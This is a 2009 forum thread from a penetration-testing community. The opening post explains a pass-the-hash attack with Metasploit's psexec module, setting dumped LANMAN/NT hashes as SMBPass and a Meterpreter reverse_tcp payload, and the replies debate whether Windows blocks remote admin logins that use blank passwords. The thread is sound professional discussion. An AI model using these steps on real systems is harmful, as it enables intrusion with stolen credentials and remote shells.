HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 56 guests and 5 members online

els_120_600.jpg

EH-Net News Feeds
Latest Additions
Book Recommendations



 
Advertisement

You are here: Home arrow Forum arrow Resourcesarrow Tutorialsarrow Pass-the-hash attack with Metasploit
EH-Net
September 02, 2010, 11:37:23 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Advertise on EH-Net!! - Reasonable Rates, Highly Targeted Audience.
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Pass-the-hash attack with Metasploit  (Read 6720 times)
0 Members and 1 Guest are viewing this topic.
Orhan
Newbie
*
Offline Offline

Posts: 14

If at first you don't succeed, cheat!


View Profile
« on: May 20, 2009, 04:05:37 PM »
I recently attended the very excellent SANS 560 course and there was a section on the "pass-the-hash" attack. The course covers both the pass-the-hash toolkit by Core Security and the patch for samba by JoMo-kun of FooFus. Both of which work very well. But there is an easier way!

If you're pen testing, you must be using Metasploit and there is a fantastic (and somewhat overlooked) exploit called:

windows/smb/psexec

This module allows you to run a command on a remote machine. A feature of this module is that it gives you the option to add a password or a hash value to the credentials being used. So if you have just exploited a machine and gained a hash dump, simply set your username (defaults is administrator) and put your password hash straight into the SMBPass field:

set SMBPass {insert in the LANMAN & NT hash only}

You can setup your payloads in the normal way:

set PAYLOAD windows/meterpreter/reverse_tcp

Setup your other variables and go exploit!

The art of password cracking without password cracking.....
Logged
GPEN OSCP OSWP CCSE CCSA CHFI..etc
Bronze Swimming certificate..
Ketchup
Hero Member
*****
Offline Offline

Posts: 966



View Profile
« Reply #1 on: May 20, 2009, 10:49:20 PM »
I am always surprised how many workstations are running with the local Administrator account having a blank password. 
Logged
~~~~~~~~~~~~~~
Ketchup
timmedin
Sr. Member
****
Offline Offline

Posts: 454



View Profile WWW
« Reply #2 on: May 20, 2009, 10:52:49 PM »
Windows does not allow remote Admin access if the local admin (or similar priveledged account) has a blank password.

"Beginning with Windows XP Home edition and later non-server editions of Windows, Windows implements the "ForceGuest" feature when the local Administrator account has a blank password. When a remote user authenticates to Windows XP (and later) as Administrator with a blank password (e.g. by mapping to one of the administrative shares), Windows will assign to their session a Guest access token, not an Administrator access token thereby preventing access to the entire C drive"

http://en.wikipedia.org/wiki/Administrative_share

I blogged about this recently too.
http://blog.securitywhole.com/2009/05/16/make-windows-more-secure-and-use-a-blank-password.aspx
« Last Edit: May 20, 2009, 10:54:37 PM by timmedin » Logged
twitter.com/timmedin | http://blog.securitywhole.com
Ketchup
Hero Member
*****
Offline Offline

Posts: 966



View Profile
« Reply #3 on: May 21, 2009, 12:42:17 AM »
I wasn't sure if that applied to psexec, but now that I think about it, psexec probably uploads an exe to one of the admin shares.

I am wondering if the story is different in a Domain environment though.   The reason I wonder is because I recently encountered yet another XP box that had a blank Administrator password.   I was able to psexec a meterpreter shell on this box, using the local Administrator account with a blank password.   I can't imagine anyone in the right mind would change group policy settings to disable this feature purposely.   I can't imagine the the workstation user changed it either.   I don't remember, but I will go back and check the GPO dumps from that job.  I am going to do some testing on a couple of domain PCs as well.
Logged
~~~~~~~~~~~~~~
Ketchup
timmedin
Sr. Member
****
Offline Offline

Posts: 454



View Profile WWW
« Reply #4 on: May 22, 2009, 08:58:42 AM »
Quote from: Ketchup on May 21, 2009, 12:42:17 AM
I wasn't sure if that applied to psexec, but now that I think about it, psexec probably uploads an exe to one of the admin shares.

I am wondering if the story is different in a Domain environment though.   The reason I wonder is because I recently encountered yet another XP box that had a blank Administrator password.   I was able to psexec a meterpreter shell on this box, using the local Administrator account with a blank password.   I can't imagine anyone in the right mind would change group policy settings to disable this feature purposely.   I can't imagine the the workstation user changed it either.   I don't remember, but I will go back and check the GPO dumps from that job.  I am going to do some testing on a couple of domain PCs as well.

i guess I stand corrected then. My understanding was RPC would not allow you to connect since the token would be restricted due to the blank password.
Logged
twitter.com/timmedin | http://blog.securitywhole.com
Ketchup
Hero Member
*****
Offline Offline

Posts: 966



View Profile
« Reply #5 on: May 22, 2009, 09:58:43 AM »
I think that you are correct actually, timmedin.   I haven't been able to reproduce this on my domain.   Still, I think that the workstation I hacked last week had some weird GPO settings on it, although I don't have that data.   I know I connected with a blank Administrator password, even Nessus identified it.   I know it was XP Pro, SP2.   Weird, I wish I still had access to that machine.
Logged
~~~~~~~~~~~~~~
Ketchup
timmedin
Sr. Member
****
Offline Offline

Posts: 454



View Profile WWW
« Reply #6 on: May 22, 2009, 10:20:39 AM »
Quote from: Ketchup on May 22, 2009, 09:58:43 AM
I think that you are correct actually, timmedin.   I haven't been able to reproduce this on my domain.   Still, I think that the workstation I hacked last week had some weird GPO settings on it, although I don't have that data.   I know I connected with a blank Administrator password, even Nessus identified it.   I know it was XP Pro, SP2.   Weird, I wish I still had access to that machine.

I just tested it again and I had the same result. Blank password is more secure than no password. Smiley
Logged
twitter.com/timmedin | http://blog.securitywhole.com
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.11 | SMF © 2006-2009, Simple Machines LLC
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.108 seconds with 24 queries.
 

careeracademy130x200.jpg

Support EH-Net

eh-net_amazonstore.jpg
Help Support EH-Net with Our Amazon Store

cbtnuggets_logo_125.jpg
Try CBT Nuggets Free!
Recent Forum Topics
Vote For EH-Net

progenic.com
Click here to Vote!

Add to Technorati Favorites
technorati fave

 
         
Advertisement

© 2010 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.